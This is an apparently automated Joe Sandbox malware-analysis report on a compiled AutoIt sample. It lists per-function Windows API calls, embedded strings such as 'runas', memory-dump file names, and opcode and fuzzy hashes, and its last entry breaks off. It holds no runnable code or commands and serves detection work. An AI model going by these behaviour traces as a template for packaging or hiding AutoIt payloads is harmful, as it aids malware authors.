Part of subcall function 00FE36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FE36E6
Part of subcall function 00FE36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FE3707
Part of subcall function 00FE36B8: ShowWindow.USER32(00000000,?,?,?,?,00FE3AA3,?), ref: 00FE371B
Part of subcall function 00FE36B8: ShowWindow.USER32(00000000,?,?,?,?,00FE3AA3,?), ref: 00FE3724

Part of subcall function 00FE4FFC: _memset.LIBCMT ref: 00FE5022
Part of subcall function 00FE4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FE50CB

Strings

runas, xrefs: 01051D84
This is a third-party compiled AutoIt script., xrefs: 01051CC8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: c113f72faff2e98c1d1731df38c61cd6123580ad2f089b1f127ceb982f34bf50
Instruction ID: 9eadf34f33e65072f0d18b7ae62d21b4814393eb2a6f828d4deb078ac9bfcfdd
Opcode Fuzzy Hash: c113f72faff2e98c1d1731df38c61cd6123580ad2f089b1f127ceb982f34bf50
Instruction Fuzzy Hash: 43514831E042C8BACF21ABF6DC09EEE7B75AF14B44F404068F5D167186DA7D5609EB21

Function 00FFDDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FFDDEC
GetCurrentProcess.KERNEL32(00000000,0107DC38,?,?), ref: 00FFDEAC
GetNativeSystemInfo.KERNELBASE(?,0107DC38,?,?), ref: 00FFDF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FFDF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FFDF1F
GetSystemInfo.KERNEL32(?,0107DC38,?,?), ref: 00FFDF29
GetSystemInfo.KERNEL32(?,0107DC38,?,?), ref: 00FFDF35

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: db64fe1d3a52dc9fd83cc0c2b481bff0f15af3c185ce55002c8bf97980b439bc
Instruction ID: 6c3fc2eda86bb7fcd3022d9a593f6bd72a4f927865d4571794f18a38329b7241
Opcode Fuzzy Hash: db64fe1d3a52dc9fd83cc0c2b481bff0f15af3c185ce55002c8bf97980b439bc
Instruction Fuzzy Hash: B161C2B280A388DFCF15CF6898C05EA7FB56F29300B1989D8D9859F25BC624C509DB66

Function 00FE406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FE449E,?,?,00000000,00000001), ref: 00FE407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FE449E,?,?,00000000,00000001), ref: 00FE4092
LoadResource.KERNEL32(?,00000000,?,?,00FE449E,?,?,00000000,00000001,?,?,?,?,?,?,00FE41FB), ref: 01054F1A
SizeofResource.KERNEL32(?,00000000,?,?,00FE449E,?,?,00000000,00000001,?,?,?,?,?,?,00FE41FB), ref: 01054F2F
LockResource.KERNEL32(00FE449E,?,?,00FE449E,?,?,00000000,00000001,?,?,?,?,?,?,00FE41FB,00000000), ref: 01054F42

Strings

SCRIPT, xrefs: 00FE4088

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 08a10774aa5b88f53e611ceffd50bd7fa98039a16179a18554c880bbc7736dc9
Instruction ID: 90678071b77ed332886ba7c275cbe38c0e72832592b70ed99fe6964dada4b3dd
Opcode Fuzzy Hash: 08a10774aa5b88f53e611ceffd50bd7fa98039a16179a18554c880bbc7736dc9
Instruction Fuzzy Hash: B5112E71600741BFE7319B66DC48F677BB9EBC5B61F10416CF68296294DA72EC00AB30

Function 01026CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,01052F49), ref: 01026CB9
FindFirstFileW.KERNELBASE(?,?), ref: 01026CCA
FindClose.KERNEL32(00000000), ref: 01026CDA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 748c897230c82b4f521c06e46577686eeec22f2929a84a499891ab5c2e0d156a
Instruction ID: ac3efcf776df440341894d475c5be044facf2225e49c59c534a7b6e25f7f5d03
Opcode Fuzzy Hash: 748c897230c82b4f521c06e46577686eeec22f2929a84a499891ab5c2e0d156a
Instruction Fuzzy Hash: E2E09231910424A782206778AC094A937ACDA09239B200755F8F1C21D0E7B699004795

Function 00FEE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FEE959
timeGetTime.WINMM ref: 00FEEBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FEED2E
TranslateMessage.USER32(?), ref: 00FEED3F
DispatchMessageW.USER32(?), ref: 00FEED4A
LockWindowUpdate.USER32(00000000), ref: 00FEED79
DestroyWindow.USER32 ref: 00FEED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEED9F
Sleep.KERNEL32(0000000A), ref: 01055270
TranslateMessage.USER32(?), ref: 010559F7
DispatchMessageW.USER32(?), ref: 01055A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01055A19

Strings

@GUI_CTRLID, xrefs: 01055314
@TRAY_ID, xrefs: 010554C9
@GUI_WINHANDLE, xrefs: 01055360
@GUI_CTRLHANDLE, xrefs: 010553AC

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: d4e30090f301f39b4967495842ec278ee6bc49372908758d00739912c692ed95
Instruction ID: 71ca92001267a64b5dc875a24bedd4f592ce1e99c565907aedfd8d681fe05b9d
Opcode Fuzzy Hash: d4e30090f301f39b4967495842ec278ee6bc49372908758d00739912c692ed95
Instruction Fuzzy Hash: 5B62D270604380DFEB60DF25DC85BAA77E4BF84314F08496DF9C68B292DB799848DB52

Function 01015C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 01015EC3
___createFile.LIBCMT ref: 01015F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 01015F2D
__dosmaperr.LIBCMT ref: 01015F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 01015F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 01015F6A
__dosmaperr.LIBCMT ref: 01015F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 01015F7C
__set_osfhnd.LIBCMT ref: 01015FAC
__lseeki64_nolock.LIBCMT ref: 01016016
__close_nolock.LIBCMT ref: 0101603C
__chsize_nolock.LIBCMT ref: 0101606C
__lseeki64_nolock.LIBCMT ref: 0101607E
__lseeki64_nolock.LIBCMT ref: 01016176
__lseeki64_nolock.LIBCMT ref: 0101618B
__close_nolock.LIBCMT ref: 010161EB

Part of subcall function 0100EA9C: CloseHandle.KERNELBASE(00000000,0108EEF4,00000000,?,01016041,0108EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0100EAEC
Part of subcall function 0100EA9C: GetLastError.KERNEL32(?,01016041,0108EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0100EAF6
Part of subcall function 0100EA9C: __free_osfhnd.LIBCMT ref: 0100EB03
Part of subcall function 0100EA9C: __dosmaperr.LIBCMT ref: 0100EB25

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

__lseeki64_nolock.LIBCMT ref: 0101620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 01016342
___createFile.LIBCMT ref: 01016361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0101636E
__dosmaperr.LIBCMT ref: 01016375
__free_osfhnd.LIBCMT ref: 01016395
__invoke_watson.LIBCMT ref: 010163C3
__wsopen_helper.LIBCMT ref: 010163DD

Strings

@, xrefs: 01015F98

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 2311346b6014fc7e9f3e9603b91df961f52506243ab3585abf5124ee8cec8e58
Instruction ID: e5d7792b5ead24545b981a496cd69d7175446f1b9127f559bf4e99a64ae73be0
Opcode Fuzzy Hash: 2311346b6014fc7e9f3e9603b91df961f52506243ab3585abf5124ee8cec8e58
Instruction Fuzzy Hash: B622277190060A9FFB2A9E6CCC44BFD7BB1EB41314F1842A9EAD19B2D9C37E8941C751

Function 0102FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0102FA96
_wcschr.LIBCMT ref: 0102FAA4
_wcscpy.LIBCMT ref: 0102FABB
_wcscat.LIBCMT ref: 0102FACA
_wcscat.LIBCMT ref: 0102FAE8
_wcscpy.LIBCMT ref: 0102FB09
__wsplitpath.LIBCMT ref: 0102FBE6
_wcscpy.LIBCMT ref: 0102FC0B
_wcscpy.LIBCMT ref: 0102FC1D
_wcscpy.LIBCMT ref: 0102FC32
_wcscat.LIBCMT ref: 0102FC47
_wcscat.LIBCMT ref: 0102FC59
_wcscat.LIBCMT ref: 0102FC6E

Part of subcall function 0102BFA4: _wcscmp.LIBCMT ref: 0102C03E
Part of subcall function 0102BFA4: __wsplitpath.LIBCMT ref: 0102C083
Part of subcall function 0102BFA4: _wcscpy.LIBCMT ref: 0102C096
Part of subcall function 0102BFA4: _wcscat.LIBCMT ref: 0102C0A9
Part of subcall function 0102BFA4: __wsplitpath.LIBCMT ref: 0102C0CE
Part of subcall function 0102BFA4: _wcscat.LIBCMT ref: 0102C0E4
Part of subcall function 0102BFA4: _wcscat.LIBCMT ref: 0102C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0102FA61

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 83ed032dbc99d3a29134a103b2fef3d4d42b0e645b871c25ae33fd6f4567ac0e
Instruction ID: 3538bf593987102845a10d84ffbf908d693a3967143425d4b83daca29cef7538
Opcode Fuzzy Hash: 83ed032dbc99d3a29134a103b2fef3d4d42b0e645b871c25ae33fd6f4567ac0e
Instruction Fuzzy Hash: 2991AD72504346AFEB21EB54C850F9FB3E9BF94310F004859F9999B292DB34EA44CB92

Function 00FE3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FE3F86
RegisterClassExW.USER32(00000030), ref: 00FE3FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE3FC1
InitCommonControlsEx.COMCTL32(?), ref: 00FE3FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE3FEE
LoadIconW.USER32(000000A9), ref: 00FE4004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE4013

Strings

+, xrefs: 00FE3F6F
0, xrefs: 00FE3F68
AutoIt v3 GUI, xrefs: 00FE3FA2
TaskbarCreated, xrefs: 00FE3FB6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: fcbd07471545090356ed4a4d098ce84ce8a21692c5e735f96394beabce683a68
Instruction ID: c762a8f34af6710be1bbd5d7bb49a22f20f2da05b0c946d3ea25aa5a54bb4d29
Opcode Fuzzy Hash: fcbd07471545090356ed4a4d098ce84ce8a21692c5e735f96394beabce683a68
Instruction Fuzzy Hash: 2D21E3B5A00718AFDB20DFE5E889BCDBBB4FB08700F44421AF691A6294D7BA05448F91

Function 0102BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0102BDB4: __time64.LIBCMT ref: 0102BDBE

Part of subcall function 00FE4517: _fseek.LIBCMT ref: 00FE452F

__wsplitpath.LIBCMT ref: 0102C083

Part of subcall function 01001DFC: __wsplitpath_helper.LIBCMT ref: 01001E3C

_wcscpy.LIBCMT ref: 0102C096
_wcscat.LIBCMT ref: 0102C0A9
__wsplitpath.LIBCMT ref: 0102C0CE
_wcscat.LIBCMT ref: 0102C0E4
_wcscat.LIBCMT ref: 0102C0F7
_wcscmp.LIBCMT ref: 0102C03E

Part of subcall function 0102C56D: _wcscmp.LIBCMT ref: 0102C65D
Part of subcall function 0102C56D: _wcscmp.LIBCMT ref: 0102C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0102C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0102C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0102C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0102C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0102C371

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 65bef91f66fc97b34deb9a0e0a2dd9f5a73ab8e703e621f199e3190ffdb4a01f
Instruction ID: 192cc521a924e468624373831a6d390887f0987b120f1e6969e5881033140d9d
Opcode Fuzzy Hash: 65bef91f66fc97b34deb9a0e0a2dd9f5a73ab8e703e621f199e3190ffdb4a01f
Instruction Fuzzy Hash: 65C14DB1E00229AFDF21DF95CD80EDEB7BDEF59300F0040AAE649E6151DB749A848F61

Function 00FE3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00FE37B3
KillTimer.USER32(?,00000001), ref: 00FE37DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FE3800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE380B
CreatePopupMenu.USER32 ref: 00FE381F
PostQuitMessage.USER32(00000000), ref: 00FE382E

Strings

TaskbarCreated, xrefs: 00FE3806

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 9439645d8e066e5ff1f5e930bcab7d9dd84d3a1d00f0185cdffc603771a879ec
Instruction ID: ace82266399b55d29ff6c851e17f09eb4dcb1287b7a6e65f6b4efa386a318730
Opcode Fuzzy Hash: 9439645d8e066e5ff1f5e930bcab7d9dd84d3a1d00f0185cdffc603771a879ec
Instruction Fuzzy Hash: 214128F66081D6ABDB206B6ADC4DF7A3AA5FB04300F400125FAD2D3194DB7A9E00B761

Function 00FE3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FE3E79
LoadCursorW.USER32(00000000,00007F00), ref: 00FE3E88
LoadIconW.USER32(00000063), ref: 00FE3E9E
LoadIconW.USER32(000000A4), ref: 00FE3EB0
LoadIconW.USER32(000000A2), ref: 00FE3EC2

Part of subcall function 00FE4024: LoadImageW.USER32(00FE0000,00000063,00000001,00000010,00000010,00000000), ref: 00FE4048

RegisterClassExW.USER32(?), ref: 00FE3F30

Part of subcall function 00FE3F53: GetSysColorBrush.USER32(0000000F), ref: 00FE3F86
Part of subcall function 00FE3F53: RegisterClassExW.USER32(00000030), ref: 00FE3FB0
Part of subcall function 00FE3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE3FC1
Part of subcall function 00FE3F53: InitCommonControlsEx.COMCTL32(?), ref: 00FE3FDE
Part of subcall function 00FE3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE3FEE
Part of subcall function 00FE3F53: LoadIconW.USER32(000000A9), ref: 00FE4004
Part of subcall function 00FE3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE4013

Strings

AutoIt v3, xrefs: 00FE3F1F
#, xrefs: 00FE3F09
0, xrefs: 00FE3F02

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 4d8b413fb2206b9d1f9728554c131432a8ed140d7b0fcaafe3fd2cf7d9cb0f84
Instruction ID: 53c95d6bab51985d2ff8443d80bd4a83ca5943ab236984107f5a3f4f137fbfb8
Opcode Fuzzy Hash: 4d8b413fb2206b9d1f9728554c131432a8ed140d7b0fcaafe3fd2cf7d9cb0f84
Instruction Fuzzy Hash: 0C2177B4E04754AFCB20DFA9E849A99BFF5FB48310F40422EE284A3294D77A5500CF91

Function 0100ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0100ACC1

Part of subcall function 01007CF4: __mtinitlocknum.LIBCMT ref: 01007D06
Part of subcall function 01007CF4: EnterCriticalSection.KERNEL32(00000000,?,01007ADD,0000000D), ref: 01007D1F

__calloc_crt.LIBCMT ref: 0100ACD2

Part of subcall function 01006986: __calloc_impl.LIBCMT ref: 01006995
Part of subcall function 01006986: Sleep.KERNEL32(00000000,000003BC,00FFF507,?,0000000E), ref: 010069AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0100ACED
GetStartupInfoW.KERNEL32(?,01096E28,00000064,01005E91,01096C70,00000014), ref: 0100AD46
__calloc_crt.LIBCMT ref: 0100AD91
GetFileType.KERNEL32(00000001), ref: 0100ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0100AE11

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 67449e2e7b7fcbffa593c4ca1cabcd20c356a6aa4333aa13450a8f365c4124da
Instruction ID: ef34c59d562ae71e5947f16f1e2edea1cbc9168edfbad781a3170cd21a8853ce
Opcode Fuzzy Hash: 67449e2e7b7fcbffa593c4ca1cabcd20c356a6aa4333aa13450a8f365c4124da
Instruction Fuzzy Hash: 13819F71A05755CFEB26CFA8C8405ADBBF0AF49324F2442ADD4E6AB3D1D7399802CB54

Function 00A85FD0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A860A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A862C7

Memory Dump Source

Source File: 00000000.00000002.2033236990.0000000000A83000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A83000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a83000_A2028041200SD.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
Instruction ID: 3e7270de0fa4863162780f54b4c8c5cbf5922df2eeccf8f8a2cfb2e2434dee86
